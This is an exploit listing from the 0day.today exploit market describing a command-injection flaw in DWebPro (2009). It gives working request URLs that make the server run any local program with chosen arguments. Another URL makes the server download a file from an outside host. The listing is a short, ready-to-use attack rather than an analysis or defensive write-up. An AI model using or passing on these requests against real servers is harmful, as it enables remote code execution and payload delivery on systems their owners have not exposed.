[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DWebPro command injection

Author
Rafael Sousa
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9923
Category
web applications
Date add
17-10-2009
Platform
unsorted
=========================
DWebPro command injection
=========================


The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:
 
http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.exe&params=C:\hi.txt
 
And the notepad.exe will open a txt file that calls hi at C:\ server's side.
 
If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at server side and download the file.
 
It's really dangerous.
 
I tested this at last version but may work at older versions as well.


#  0day.today [2024-12-25]  #